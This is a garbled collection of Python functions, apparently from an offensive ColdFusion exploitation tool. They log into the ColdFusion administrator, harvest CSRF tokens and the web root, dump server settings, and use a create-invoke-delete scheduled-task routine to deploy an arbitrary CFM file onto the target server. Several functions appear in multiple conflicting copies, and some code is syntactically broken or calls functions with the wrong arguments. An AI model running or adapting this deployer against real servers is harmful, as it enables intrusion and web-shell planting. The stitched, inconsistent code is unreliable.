def fetch_csrf(ip, fingerprint, url):
""" Most of these requests use a CSRF; we can grab this so long as
we send the request using the same session token.
Returns a tuple of (cookie, csrftoken)
"""
if fingerprint.version not in ['9.0', '10.0', '11.0']:
# versions <= 8.x do not use a CSRF token
return (checkAuth(ip, fingerprint.port, title,
fingerprint.version)[0], None)
# lets try and fetch CSRF
cookies = checkAuth(ip, fingerprint.port, title, fingerprint.version)
if cookies:
response = utility.requests_get(url, cookies=cookies[0])
else:
utility.Msg("Could not get auth for %s:%s" % (ip, fingerprint.port),
LOG.ERROR)
return False
if response.status_code is 200:
token = findall("name=\"csrftoken\" value=\"(.*?)\">",
response.content)
if len(token) > 0:
return (cookies[0], token[0])
else:
utility.Msg("CSRF appears to be disabled.", LOG.DEBUG)
return (cookies[0], None)
def fetch_csrf(ip, fingerprint, url):
""" Most of these requests use a CSRF; we can grab this so long as
we send the request using the same session token.
Returns a tuple of (cookie, csrftoken)
"""
if fingerprint.version not in ['9.0', '10.0']:
# versions <= 8.x do not use a CSRF token
return (checkAuth(ip, fingerprint.port, title, fingerprint.version)[0], None)
# lets try and fetch CSRF
cookies = checkAuth(ip, fingerprint.port, title, fingerprint.version)
if cookies:
response = utility.requests_get(url, cookies=cookies[0])
else:
utility.Msg("Could not get auth for %s:%s" % (ip, fingerprint.port), LOG.ERROR)
return False
if response.status_code is 200:
token = findall("name=\"csrftoken\" value=\"(.*?)\">", response.content)
if len(token) > 0:
return (cookies[0], token[0])
else:
utility.Msg("CSRF appears to be disabled.", LOG.DEBUG)
return (cookies[0], None)
def fetch_webroot(ip, fingerprint):
""" Pick out the web root from the settings summary page
"""
url = "http://{0}:{1}/CFIDE/administrator/reports/index.cfm"\
.format(ip, fingerprint.port)
cookies = checkAuth(ip, fingerprint.port, title, fingerprint.version)
if cookies:
req = utility.requests_get(url, cookies=cookies[0])
else:
utility.Msg("Could not get auth for %s:%s" % (ip, fingerprint.port), LOG.ERROR)
return False
if req.status_code is 200:
root_regex = "CFIDE </td><td scope=row class=\"cellRightAndBottomBlueSide\">(.*?)</td>"
if fingerprint.version in ["7.0"]:
root_regex = root_regex.replace("scope=row ", "")
data = findall(root_regex, req.content.translate(None, "\n\t\r"))
if len(data) > 0:
return data[0].replace("\", "\\").replace(":", ":")[:-7]
else:
return False
def fetch_webroot(ip, fingerprint):
""" Pick out the web root from the settings summary page
"""
url = "http://{0}:{1}/CFIDE/administrator/reports/index.cfm"\
.format(ip, fingerprint.port)
cookies = checkAuth(ip, fingerprint.port, title, fingerprint.version)
if cookies:
req = utility.requests_get(url, cookies=cookies[0])
else:
utility.Msg("Could not get auth for %s:%s" % (ip, fingerprint.port),
LOG.ERROR)
return False
if req.status_code is 200:
root_regex = "CFIDE </td><td scope=row class=\"cellRightAndBottomBlueSide\">(.*?)</td>"
if fingerprint.version in ["7.0"]:
root_regex = root_regex.replace("scope=row ", "")
data = findall(root_regex, req.content.translate(None, "\n\t\r"))
if len(data) > 0:
return data[0].replace("\", "\\").replace(":", ":")[:-7]
else:
return False
def run(self, fingerengine, fingerprint):
""" Obtains remote Coldfusion information from the reports index page.
This pulls the first 26 entries from this report, as there's lots of
extraneous stuff. Perhaps if requested I'll prompt to extend to the
remainder of the settings.
"""
if fingerprint.version in ["5.0", "6.0", "6.1"]:
return self._run5(fingerengine, fingerprint)
utility.Msg("Attempting to retrieve Coldfusion info...")
base = "http://{0}:{1}".format(fingerengine.options.ip, fingerprint.port)
uri = "/CFIDE/administrator/reports/index.cfm"
if fingerprint.version in ["7.0"]:
uri = '/CFIDE/administrator/settings/version.cfm'
cookies = checkAuth(fingerengine.options.ip, fingerprint.port,
fingerprint.title, fingerprint.version)
if not cookies:
utility.Msg("Could not get auth for %s:%s" %
(fingerengine.options.ip, fingerprint.port), LOG.ERROR)
return
else:
cookies = cookies[0]
try:
response = utility.requests_get(base + uri, cookies=cookies)
except Exception, e:
utility.Msg("Failed to fetch info: %s" % e, LOG.ERROR)
return
def _run5(self, fingerengine, fingerprint):
""" Pull sys info from older CF instances; it is quite ugly
"""
utility.Msg("Attempting to retrieve Coldfusion info...")
cookies = checkAuth(fingerengine.options.ip, fingerprint.port,
fingerprint.title, fingerprint.version)[0]
if not cookies:
utility.Msg(
"Could not get auth for %s:%s" %
(fingerengine.options.ip, fingerprint.port), LOG.ERROR)
return
base = 'http://{0}:{1}'.format(fingerengine.options.ip,
fingerprint.port)
if fingerprint.version in ['5.0']:
uri = '/CFIDE/administrator/server_settings/version.cfm'
elif fingerprint.version in ['6.0', '6.1']:
uri = '/CFIDE/administrator/settings/version.cfm'
response = utility.requests_get(base + uri, cookies=cookies)
if fingerprint.version in ['5.0']:
keys = findall("<td height=\".*?\" nowrap>(.*?)</td>",
response.content.translate(None, '\r\n'))[1:]
values = findall("<td>(.*?)</td>",
response.content.translate(None, '\r\n'))
for (key, value) in zip(keys, values[2:]):
k = findall("class=\"text2\">(.*?)</p>",
key)[0].replace(" ", '').rstrip()
v = findall(">(.*?)\t", value)[0].replace(' ', '')
utility.Msg(" %s: %s" % (k, v))
elif fingerprint.version in ['6.0', '6.1']:
keys = findall("<td height=\"18\" nowrap>(.*?)</td>",
response.content.translate(None, '\r\n'))
values = findall(
"<td width=\"100%\" class=\"color-row\">(.*?)</td>",
response.content.translate(None, '\r\n'))
for (key, value) in zip(keys[:-2], values[:-2]):
k = findall(" (.*?) ", key)[0].lstrip().rstrip()
v = findall(" (.*?)\t", value)[0].lstrip().rstrip()
utility.Msg(" %s: %s" % (k, v))
def run(self, fingerengine, fingerprint):
""" Obtains remote Coldfusion information from the reports index page.
This pulls the first 26 entries from this report, as there's lots of
extraneous stuff. Perhaps if requested I'll prompt to extend to the
remainder of the settings.
"""
if fingerprint.version in ["5.0", "6.0", "6.1"]:
return self._run5(fingerengine, fingerprint)
utility.Msg("Attempting to retrieve Coldfusion info...")
base = "http://{0}:{1}".format(fingerengine.options.ip,
fingerprint.port)
uri = "/CFIDE/administrator/reports/index.cfm"
if fingerprint.version in ["7.0"]:
uri = '/CFIDE/administrator/settings/version.cfm'
cookies = checkAuth(fingerengine.options.ip, fingerprint.port,
fingerprint.title, fingerprint.version)
if not cookies:
utility.Msg(
"Could not get auth for %s:%s" %
(fingerengine.options.ip, fingerprint.port), LOG.ERROR)
return
else:
cookies = cookies[0]
try:
response = utility.requests_get(base + uri, cookies=cookies)
except Exception as e:
utility.Msg("Failed to fetch info: %s" % e, LOG.ERROR)
return
if response.status_code == 200:
regex = self.versionRegex(fingerprint.version)
types = findall(regex[0],
response.content.translate(None, "\n\t\r"))
data = findall(regex[1],
response.content.translate(None, "\n\t\r"))
# pad
if fingerprint.version in ["8.0", "9.0", "10.0", '11.0']:
types.insert(0, "Version")
for (row, data) in zip(types, data)[:26]:
utility.Msg(' %s: %s' % (row, data[:-7]))
def _run5(self, fingerengine, fingerprint):
""" Pull sys info from older CF instances; it is quite ugly
"""
utility.Msg("Attempting to retrieve Coldfusion info...")
cookies = checkAuth(fingerengine.options.ip, fingerprint.port,
fingerprint.title, fingerprint.version)[0]
if not cookies:
utility.Msg("Could not get auth for %s:%s" %
(fingerengine.options.ip, fingerprint.port), LOG.ERROR)
return
base = 'http://{0}:{1}'.format(fingerengine.options.ip,
fingerprint.port)
if fingerprint.version in ['5.0']:
uri = '/CFIDE/administrator/server_settings/version.cfm'
elif fingerprint.version in ['6.0', '6.1']:
uri = '/CFIDE/administrator/settings/version.cfm'
response = utility.requests_get(base+uri, cookies=cookies)
if fingerprint.version in ['5.0']:
keys = findall("<td height=\".*?\" nowrap>(.*?)</td>", response.content.translate(None, '\r\n'))[1:]
values = findall("<td>(.*?)</td>", response.content.translate(None, '\r\n'))
for (key, value) in zip(keys, values[2:]):
k = findall("class=\"text2\">(.*?)</p>", key)[0].replace(" ",'').rstrip()
v = findall(">(.*?)\t", value)[0].replace(' ','')
utility.Msg(" %s: %s" % (k, v))
elif fingerprint.version in ['6.0', '6.1']:
keys = findall("<td height=\"18\" nowrap>(.*?)</td>",
response.content.translate(None, '\r\n'))
values = findall("<td width=\"100%\" class=\"color-row\">(.*?)</td>",
response.content.translate(None, '\r\n'))
for (key, value) in zip(keys[:-2], values[:-2]):
k = findall(" (.*?) ", key)[0].lstrip().rstrip()
v = findall(" (.*?)\t", value)[0].lstrip().rstrip()
utility.Msg(" %s: %s" % (k, v))
def run(self, fingerengine, fingerprint):
""" Obtains remote Coldfusion information from the reports index page.
This pulls the first 26 entries from this report, as there's lots of
extraneous stuff. Perhaps if requested I'll prompt to extend to the
remainder of the settings.
"""
utility.Msg("Attempting to retrieve Coldfusion info...")
base = "http://{0}:{1}".format(fingerengine.options.ip, fingerprint.port)
uri = "/CFIDE/administrator/reports/index.cfm"
response = utility.requests_get(base + uri)
if response.status_code == 200 and "ColdFusion Administrator Login" \
in response.content:
utility.Msg("Host %s:%s requires auth, checking..." %
(fingerengine.options.ip, fingerprint.port), LOG.DEBUG)
cookies = checkAuth(fingerengine.options.ip, fingerprint.port,
fingerprint.title, fingerprint.version)
if cookies:
response = utility.requests_get(base + uri, cookies=cookies[0])
else:
utility.Msg("Could not get auth for %s:%s" %
(fingerengine.options.ip, fingerprint.port), LOG.ERROR)
return
if response.status_code == 200:
types = findall("<td scope=row nowrap class=\"cell3BlueSides\">(.*?)</td>",
response.content.translate(None, "\n\t\r"))
data = findall("<td scope=row class=\"cellRightAndBottomBlueSide\">(.*?)</td>",
response.content.translate(None, "\n\t\r"))
# pad
types.insert(0, "Version")
for (row, data) in zip(types, data)[:26]:
utility.Msg(' %s: %s' % (row, data[:-7]))
def deploy(fingerengine, fingerprint):
""" Scheduled Task deployer for older versions; radically different
than newer systems, so it warrants its own deployer.
"""
cfm_path = abspath(fingerengine.options.deploy)
cfm_file = parse_war_path(cfm_path, True)
dip = fingerengine.options.ip
cookie = checkAuth(dip, fingerprint.port, title, fingerprint.version)[0]
if not cookie:
utility.Msg("Could not get auth", LOG.ERROR)
return
utility.Msg("Preparing to deploy {0}...".format(cfm_file))
utility.Msg("Fetching web root...", LOG.DEBUG)
root = fetch_webroot(dip, fingerprint, cookie)
if not root:
utility.Msg("Unable to fetch web root.", LOG.ERROR)
return
# create the scheduled task
utility.Msg("Web root found at %s" % root, LOG.DEBUG)
utility.Msg("Creating scheduled task...")
if not create_task(dip, fingerprint, cfm_file, root, cookie):
return
# invoke the task
utility.Msg("Task %s created, invoking..." % cfm_file)
run_task(dip, fingerprint, cfm_path, cookie)
# cleanup
utility.Msg("Cleaning up...")
if not delete_task(dip, fingerprint, cfm_file, cookie):
utility.Msg("Failed to remove task. May require manual removal.",
LOG.ERROR)
def deploy(fingerengine, fingerprint):
""" Scheduled Task deployer for older versions; radically different
than newer systems, so it warrants its own deployer.
"""
cfm_path = abspath(fingerengine.options.deploy)
cfm_file = parse_war_path(cfm_path, True)
dip = fingerengine.options.ip
cookie = checkAuth(dip, fingerprint.port, title, fingerprint.version)[0]
if not cookie:
utility.Msg("Could not get auth", LOG.ERROR)
return
utility.Msg("Preparing to deploy {0}...".format(cfm_file))
utility.Msg("Fetching web root...", LOG.DEBUG)
root = fetch_webroot(dip, fingerprint, cookie)
if not root:
utility.Msg("Unable to fetch web root.", LOG.ERROR)
return
# create the scheduled task
utility.Msg("Web root found at %s" % root, LOG.DEBUG)
utility.Msg("Creating scheduled task...")
if not create_task(dip, fingerprint, cfm_file, root, cookie):
return
# invoke the task
utility.Msg("Task %s created, invoking..." % cfm_file)
run_task(dip, fingerprint, cfm_path, cookie)
# cleanup
utility.Msg("Cleaning up...")
if not delete_task(dip, fingerprint, cfm_file, cookie):
utility.Msg("Failed to remove task. May require manual removal.", LOG.ERROR)
class Auxiliary:
def __init__(self):
self.name = 'Dump host information'
self.versions = ['7.0', '8.0', '9.0', '10.0']
self.show = True
self.flag = 'cf-info'
def check(self, fingerprint):
if fingerprint.title == CINTERFACES.CFM and \
fingerprint.version in self.versions:
return True
return False
def run(self, fingerengine, fingerprint):
""" Obtains remote Coldfusion information from the reports index page.
This pulls the first 26 entries from this report, as there's lots of
extraneous stuff. Perhaps if requested I'll prompt to extend to the
remainder of the settings.
"""
utility.Msg("Attempting to retrieve Coldfusion info...")
base = "http://{0}:{1}".format(fingerengine.options.ip,
fingerprint.port)
uri = "/CFIDE/administrator/reports/index.cfm"
if fingerprint.version in ["7.0"]:
uri = '/CFIDE/administrator/settings/version.cfm'
try:
response = utility.requests_get(base + uri)
except Exception, e:
utility.Msg("Failed to fetch info: %s" % e, LOG.ERROR)
return
if response.status_code == 200 and "ColdFusion Administrator Login" \
in response.content:
utility.Msg(
"Host %s:%s requires auth, checking..." %
(fingerengine.options.ip, fingerprint.port), LOG.DEBUG)
cookies = checkAuth(fingerengine.options.ip, fingerprint.port,
fingerprint.title, fingerprint.version)
if cookies:
response = utility.requests_get(base + uri, cookies=cookies[0])
else:
utility.Msg(
"Could not get auth for %s:%s" %
(fingerengine.options.ip, fingerprint.port), LOG.ERROR)
return
if response.status_code == 200:
regex = self.versionRegex(fingerprint.version)
types = findall(regex[0],
response.content.translate(None, "\n\t\r"))
data = findall(regex[1],
response.content.translate(None, "\n\t\r"))
# pad
if fingerprint.version in ["8.0", "9.0", "10.0"]:
types.insert(0, "Version")
for (row, data) in zip(types, data)[:26]:
utility.Msg(' %s: %s' % (row, data[:-7]))
